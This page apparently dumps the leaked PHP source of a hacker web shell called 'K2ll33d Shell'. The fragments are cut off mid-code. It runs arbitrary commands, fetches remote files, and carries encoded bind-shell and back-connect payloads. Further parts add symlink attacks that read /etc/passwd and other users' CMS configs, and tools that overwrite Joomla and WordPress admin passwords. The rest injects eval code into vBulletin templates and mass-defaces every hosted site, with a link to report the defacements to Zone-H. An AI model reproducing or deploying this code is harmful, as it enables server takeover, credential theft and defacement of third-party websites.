You are here

Home :: hahahhahahahhahahahahahhahahahahah

hahahhahahahhahahahahahhahahahahah

[ ";if ($letter.":" != $v){$letters .= $letter;} else {$letters .= "".$letter."";} $letters .= " ] ";}}} if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE;$server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);$my_ip = $_SERVER['REMOTE_ADDR'];$bindport = "13123";$bindport_pass = "k2ll33d";$pwds = explode(DIRECTORY_SEPARATOR,$pwd);$pwdurl = "";for($i = 0 ;$i < sizeof($pwds)-1 ;$i++){$pathz = "";for($j = 0 ;$j <= $i ;$j++){$pathz .= $pwds[$j].DIRECTORY_SEPARATOR;} $pwdurl .= "".$pwds[$i]." ".DIRECTORY_SEPARATOR." ";} if(isset($_POST['rename'])){$old = $_POST['oldname'];$new = $_POST['newname'];@rename($pwd.$old,$pwd.$new);$file = $pwd.$new;} if(isset($_POST['chmod'])){ $name = $_POST['name'];$value = $_POST['newvalue'];if (strlen($value)==3){$value = 0 . "" . $value;}@chmod($pwd.$name,octdec($value));$file = $pwd.$name;} if(isset($_POST['chmod_folder'])){$name = $_POST['name'];$value = $_POST['newvalue'];if (strlen($value)==3){$value = 0 . "" . $value;}@chmod($pwd.$name,octdec($value));$file = $pwd.$name;} $buff = " ".$software."
";$buff .= " ".$system."
";if($id != "") $buff .= " ".$id."
";if($safemode) $buff .= " safemode : ON
";else $buff .= " safemode : OFF
"; function showstat($stat) {if ($stat=="on") {return "ON";}else {return "OFF";}} function testmysql() {if (function_exists('mysql_connect')) {return showstat("on");}else {return showstat("off");}} function testcurl() {if (function_exists('curl_version')) {return showstat("on");}else {return showstat("off");}} function testwget() {if (exe('wget --help')) {return showstat("on");}else {return showstat("off");}} function testperl() {if (exe('perl -h')) {return showstat("on");}else {return showstat("off");}} $buff .= " MySQL: ".testmysql()." | Perl: ".testperl()." | cURL: ".testcurl()." | WGet: ".testwget()."
"; $buff .= " ".$letters." > ".$pwdurl; function rapih($text){return trim(str_replace("
","",$text));} function magicboom($text){if (!get_magic_quotes_gpc()){return $text;} return stripslashes($text);} function showdir($pwd,$prompt){$fname = array();$dname = array(); if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;else $posix = FALSE;$user = "????:????"; if($dh = opendir($pwd)){while($file = readdir($dh)){ if(is_dir($file)){$dname[] = $file;} elseif(is_file($file)){$fname[] = $file;}}closedir($dh);} sort($fname);sort($dname);$path = @explode(DIRECTORY_SEPARATOR,$pwd);$tree = @sizeof($path);$parent = ""; $buff = "
$prompt
view file/folder
"; if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR; else $parent = $pwd; foreach($dname as $folder){ if($folder == ".") { if(!$win && $posix){$name=@posix_getpwuid(@fileowner($folder));$group=@posix_getgrgid(@filegroup($folder));$owner = $name['name']." : ".$group['name'];} else {$owner = $user;} $buff .= " ";} elseif($folder == ".."){ if(!$win && $posix) {$name=@posix_getpwuid(@fileowner($folder));$group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']." : ".$group['name'];} else { $owner = $user; } $buff .= "";}else{if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']." : ".$group['name'];} else { $owner = $user; } $buff .= "";}} foreach($fname as $file){ $full = $pwd.$file; if(!$win && $posix){$name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name['name']." : ".$group['name'];} else { $owner = $user; } $buff .= "";} $buff .= "
namesizeowner:grouppermsmodifiedactions
$folder- ".$owner."
".get_perms($pwd)."
 ".date("d-M-Y H:i",@filemtime($pwd))." newfile | newfolder
- ".$owner."
".get_perms($parent)."
 ".date("d-M-Y H:i",@filemtime($parent))." newfile | newfolder
$folder
DIR".$owner."
".get_perms($pwd.$folder)."
".date("d-M-Y H:i",@filemtime($folder))."rename| delete
$file
".ukuran($full)."".$owner."
".get_perms($full)."
".date("d-M-Y H:i",@filemtime($full))." edit | rename| delete | download (gz)
"; return $buff;} function ukuran($file){if($size = @filesize($file)){if($size <= 1024) return $size;else{if($size <= 1024*1024) {$size = @round($size / 1024,2);; return "$size kb";} else {$size = @round($size / 1024 / 1024,2);return "$size mb";}}} else return "???";} function exe($cmd){if(function_exists('system')) {@ob_start();@system($cmd);$buff = @ob_get_contents();$buff = @ob_get_contents();@ob_end_clean(); return $buff;} elseif(function_exists('exec')) {@exec($cmd,$results);$buff = "";foreach($results as $result){$buff .= $result;} return $buff;} elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$buff = @ob_get_contents();@ob_end_clean();return $buff;} elseif(function_exists('shell_exec')){$buff = @shell_exec($cmd);return $buff;}} function tulis($file,$text){$textz = gzinflate(base64_decode($text));if($filez = @fopen($file,"w")) {@fputs($filez,$textz);@fclose($file);}} function ambil($link,$file) {if($fp = @fopen($link,"r")){while(!feof($fp)){$cont.= @fread($fp,1024);}@fclose($fp);$fp2 = @fopen($file,"w");@fwrite($fp2,$cont);@fclose($fp2);} } function which($pr){$path = exe("which $pr"); if(!empty($path)) {return trim($path);} else {return trim($pr);}} function download($cmd,$url){$namafile = basename($url); switch($cmd){case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break;case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break;case 'wfread' : ambil($wurl,$namafile);break;case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break;case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break;case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break;case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break;default: break;} return $namafile;}function get_perms($file) {if($mode=@fileperms($file)){$perms='';$perms .= ($mode & 00400) ? 'r' : '-';$perms .= ($mode & 00200) ? 'w' : '-';$perms .= ($mode & 00100) ? 'x' : '-';$perms .= ($mode & 00040) ? 'r' : '-';$perms .= ($mode & 00020) ? 'w' : '-';$perms .= ($mode & 00010) ? 'x' : '-';$perms .= ($mode & 00004) ? 'r' : '-';$perms .= ($mode & 00002) ? 'w' : '-';$perms .= ($mode & 00001) ? 'x' : '-'; return $perms;}else return "??????????";}function clearspace($text){return str_replace(" ","_",$text);}$port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";$port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";$back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";$back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw=="; ?> k2ll33d
  
server ip :
your ip : ".$my_ip."
";?>
H O M E





K2ll33d Shell

By K2ll33d


Mail | Facebook | Zone-H

'.date('Y').'

';} elseif(isset($_GET['x']) && ($_GET['x'] == 'sf')) {@set_time_limit(0);@mkdir('sym',0777);error_reporting(0);$htaccess = "Options all \n DirectoryIndex gaza.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";$op =@fopen ('sym/.htaccess','w');fwrite($op ,$htaccess);echo '



Symlinker


File Path:

Symlink Name




';$target = $_POST['file'];$symfile = $_POST['symfile'];$symlink = $_POST['symlink'];if ($symlink) {@symlink("$target","sym/$symfile");echo '
'.$symfile.'



';}} elseif(isset($_GET['x']) && ($_GET['x'] == 'js')) {if ($_POST['symjo']) {$config = file_get_contents($_POST['url']);$user = $_POST['user'];$pass = md5($_POST['pass']);function ex($text,$a,$b){$explode = explode($a,$text);$explode = explode($b,$explode[1]);return $explode[0];}if($config && ereg('JConfig',$config)){$psswd = ex($config,'$password = \'',"';");$username = ex($config,'$user = \'',"';");$dbname = ex($config,'$db = \'',"';");$prefix = ex($config,'$dbprefix = \'',"';");$host = ex($config,'$host = \'',"';");$email = ex($config,'$mailfrom = \'',"';");$formn = ex($config,'$fromname = \'',"';");$conn = mysql_connect($host,$username,$psswd) or die(mysql_error());mysql_select_db($dbname,$conn) or die($username.' '.$psswd.' '.$host.' '.$dbname);$query = @mysql_query("UPDATE `".$prefix."users` SET `username` ='".$user."' , `password` = '".$pass."', `usertype` = 'Super Administrator', `block` = 0");if ($query) {echo '

Done !


site nameuserpasswordemail
'.$formn.''.$user.''.$_POST["pass"].''.$email.'
';}else {echo '

ERROR !

';}}else die('

Not a joomla config

');}else { ?>


Joomla login changer ( symlink version )


config link :
new user :
new password :

S. No.DomainsUsersSymlink";$dcount = 1;foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "" . $dcount . "".$domains[1][0]."".$user['name']."Symlink"; flush();$dcount++;}}}echo "";}else{$TEST=@file('/etc/passwd');if ($TEST){@mkdir("k2",0777);@chdir("k2");exe("ln -s / root");$file3 = 'Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "

";$dcount = 1;$file = fopen("/etc/passwd", "r") or exit("Unable to open file!");while(!feof($file)){$s = fgets($file);$matches = array();$t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")continue;echo "";echo "";$dcount++;}fclose($file);echo "
S. No.UsersSymlink
" . $dcount . "" . $matches . "Symlink
";}else{if($os != "Windows"){@mkdir("k2",0777);@chdir("k2");@exe("ln -s / root");$file3 = 'Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "

server symlinker

";$temp = "";$val1 = 0;$val2 = 1000;for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);if ($uid)$temp .= join(':',$uid)."\n";}echo '
';$temp = trim($temp);$file5 = fopen("test.txt","w");fputs($file5,$temp);fclose($file5);$dcount = 1;$file = fopen("test.txt", "r") or exit("Unable to open file!");while(!feof($file)){$s = fgets($file);$matches = array();$t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")continue;echo "";echo "";$dcount++;}fclose($file);echo "
idUsersSymlink
" . $dcount . "" . $matches . "Symlink
";unlink("test.txt");} else echo "
Cannot create Symlink
";}}} elseif(isset($_GET['x']) && ($_GET['x'] == 'mass')){error_reporting(0);?>


Folder Mass Defacer


Folder :

File Name :

index URL :

";$dir=opendir("$mainpath");while($row=readdir($dir)){$start=@fopen("$row/$file","w+");$code=@file_get_contents($indexurl);$finish=@fwrite($start,$code);if ($finish){echo "» $row/$file » Done

";}}} elseif(isset($_GET['x']) && ($_GET['x'] == 'vb')) {if(empty($_POST['index'])){echo "



Vbulletin index changer


host :  | database :  | username :  | password :  | perfix :


";}else{$localhost = $_POST['localhost'];$database = $_POST['database'];$username = $_POST['username'];$password = $_POST['password'];$perfix = $_POST['perfix'];$index = $_POST['index'];@mysql_connect($localhost,$username,$password) or die(mysql_error());@mysql_select_db($database) or die(mysql_error());$index=str_replace("\'","'",$index);$set_index = "{\${eval(base64_decode(\'";$set_index .= base64_encode("echo '$index';");$set_index .= "\'))}}{\${exit()}}";$ok=@mysql_query("UPDATE ".$perfix."template SET template ='".$set_index."' WHERE title ='FORUMHOME'") or die(mysql_error());if($ok){echo "Defaced

";}}} elseif(isset($_GET['x']) && ($_GET['x'] == 'boom')){error_reporting(0);function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){$ar0=explode($marqueurDebutLien, $text);$ar1=explode($marqueurFinLien, $ar0[$i]);return trim($ar1[0]);}function randomt() {$chars = "abcdefghijkmnopqrstuvwxyz023456789";srand((double)microtime()*1000000);$i = 0;$pass = '';while ($i <= 7) {$num = rand() % 33;$tmp = substr($chars, $num, 1);$pass = $pass . $tmp;$i++;}return $pass;}function index_changer_wp($conf, $content) {$output = '';$dol = '$';$go = 0;$username = entre2v2($conf,"define('DB_USER', '","');");$password = entre2v2($conf,"define('DB_PASSWORD', '","');");$dbname = entre2v2($conf,"define('DB_NAME', '","');");$prefix = entre2v2($conf,$dol."table_prefix = '","'");$host = entre2v2($conf,"define('DB_HOST', '","');");$link=mysql_connect($host,$username,$password);if($link) {mysql_select_db($dbname,$link) ;$dol = '$';$req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '4297f44b13955235245b2497399d7a93' WHERE `ID` = 1");} else {$output.= "[-] DB Error
";}if($req1) {$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");$data = mysql_fetch_array($req);$site_url=$data["option_value"]; $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");$data = mysql_fetch_array($req);$template = $data["option_value"];$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");$data = mysql_fetch_array($req);$current_theme = $data["option_value"];$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";$url2=$site_url."/wp-login.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);$pos = strpos($buffer,"action=logout");if($pos === false) {$output.= "[-] Login Error
";} else {$output.= "[+] Login Successful
";$go = 1;}if($go) {$cond = 0;$url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,'');$_file = entre2v2($buffer0,'');if(substr_count($_file,"/index.php") != 0){$output.= "[+] index.php loaded in Theme Editor
";$url2=$site_url."/wp-admin/theme-editor.php";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'
');if($pos === false) {$output.= "[-] Updating Index.php Error
";} else {$output.= "[+] Index.php Updated Successfuly
";$hk = explode('public_html',$_file);$output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));$cond = 1;}} else {$url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,'');$_file = entre2v2($buffer0,'');if(substr_count($_file,"index.php") != 0){$output.= "[+] index.php loaded in Theme Editor
";$url2=$site_url."/wp-admin/theme-editor.php";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'
');if($pos === false) {$output.= "[-] Updating Index.php Error
";} else {$output.= "[+] Index.php Template Updated Successfuly
";$output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');$cond = 1;}} else {$output.= "[-] index.php can not load in Theme Editor
";}}}} else {$output.= "[-] DB Error
";}global $base_path;unlink($base_path.'COOKIE.txt');return array('cond'=>$cond, 'output'=>$output);}function index_changer_joomla($conf, $content, $domain) {$doler = '$';$username = entre2v2($conf, $doler."user = '", "';");$password = entre2v2($conf, $doler."password = '", "';");$dbname = entre2v2($conf, $doler."db = '", "';");$prefix = entre2v2($conf, $doler."dbprefix = '", "';");$host = entre2v2($conf, $doler."host = '","';");$co=randomt();$site_url = "http://".$domain."/administrator";$output = '';$cond = 0; $link=mysql_connect($host, $username, $password);if($link) {mysql_select_db($dbname,$link) ;$req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '4297f44b13955235245b2497399d7a93', `usertype` = 'Super Administrator', `block` = 0");$req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));} else {$output.= "[-] DB Error
";}if($req1){if ($req) {$req = mysql_query("SELECT * from `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");$data = mysql_fetch_array($req);$template_name = $data["template"];$req = mysql_query("SELECT * from `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");$data = mysql_fetch_array($req);$template_id = $data["extension_id"];$url2=$site_url."/index.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$return = entre2v2($buffer ,'');$cond = 0;if($pos === false) {$output.= "[-] Updating Index.php Error
";} else {$output.= "[+] Index.php Template successfully saved
";$cond = 1;}}} else {$req =mysql_query("SELECT * from `".$prefix."templates_menu` WHERE client_id='0'");$data = mysql_fetch_array($req);$template_name=$data["template"];$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";$url2=$site_url."/index.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden=entre2v2($buffer ,'');$cond = 0;if($pos === false) {$output.= "[-] Updating Index.php Error
";} else {$output.= "[+] Index.php Template successfully saved
";$cond = 1;}}}} else {$output.= "[-] DB Error
";}global $base_path;unlink($base_path.$co);return array('cond'=>$cond, 'output'=>$output); }function exec_mode_1($def_url) {@mkdir('sym',0777);$wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";$fp = @fopen ('sym/.htaccess','w');fwrite($fp, $wr);@symlink('/','sym/root');$dominios = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);$out[1] = array_unique($out[1]);$numero_dominios = count($out[1]);echo "Total domains: $numero_dominios

";$def = file_get_contents($def_url);$def = urlencode($def);$dd = 'PD9waHANCiRkZWYgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3pvbmVobWlycm9ycy5vcmcvZGVmYWNlZC8yMDEzLzAzLzE5L2Fzc29jaWFwcmVzcy5uZXQnKTsNCiRwID0gZXhwbG9kZSgncHVibGljX2h0bWwnLGRpcm5hbWUoX19GSUxFX18pKTsNCiRwID0gJHBbMF0uJ3B1YmxpY19odG1sJzsNCmlmICgkaGFuZGxlID0gb3BlbmRpcigkcCkpIHsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXguaHRtbCcsJ3crJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXgucGhwJywndysnKTsNCiAgICBAZndyaXRlKCRmcDEsICRkZWYpOw0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRleC5odG0nLCd3KycpOw0KICAgIEBmd3JpdGUoJGZwMSwgJGRlZik7DQogICAgZWNobyAnRG9uZSc7DQp9DQpjbG9zZWRpcigkaGFuZGxlKTsNCnVubGluayhfX0ZJTEVfXyk7DQo/Pg==';$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';$output = fopen('defaced.html', 'a+');$_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;$_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;echo '';$j = 1;$st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;for($i = $st; $i <= $numero_dominios; $i++){$domain = $out[1][$i];$dono_arquivo = @fileowner("/etc/valiases/".$domain);$infos = @posix_getpwuid($dono_arquivo);if($infos['name']!='root') {$config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");$config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");$config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '';echo '';$res = index_changer_joomla($config01, $def, $domain);echo '';if($res['cond']) {echo '';fwrite($output, 'http://'.$domain."
");$_SESSION['count1'] = $_SESSION['count1'] + 1;} else {echo '';}echo '';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '';echo '';$res = index_changer_wp($config02, $dd);echo '';if($res['cond']) {echo '';fwrite($output, 'http://'.$domain."
");$_SESSION['count2'] = $_SESSION['count2'] + 1;} else {echo '';}echo '';}$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config03 && preg_match('/DB_NAME/i',$config03)){echo '';echo '';$res = index_changer_wp($config03, $dd);echo '';if($res['cond']) {echo '';fwrite($output, 'http://'.$domain."
");$_SESSION['count2'] = $_SESSION['count2'] + 1;} else {echo '';}echo '';}}}echo '
IDSIDDomainTypeActionStatus
'.($j++).''.$i.''.$domain.'JOOMLA'.$res['output'].'DEFACEDFAILED
'.($j++).''.$i.''.$domain.'WORDPRESS'.$res['output'].'DEFACEDFAILED
'.($j++).''.$i.''.$domain.'WORDPRESS'.$res['output'].'DEFACEDFAILED
';echo '
';echo 'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')
';echo 'View Total Defaced urls
';if($_SESSION['count1']+$_SESSION['count2'] > 0){echo 'Send to Zone-H';}}function exec_mode_2($def_url) {$domains = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);$out = array_unique($out[1]);$num = count($out);print("Total domains: $num

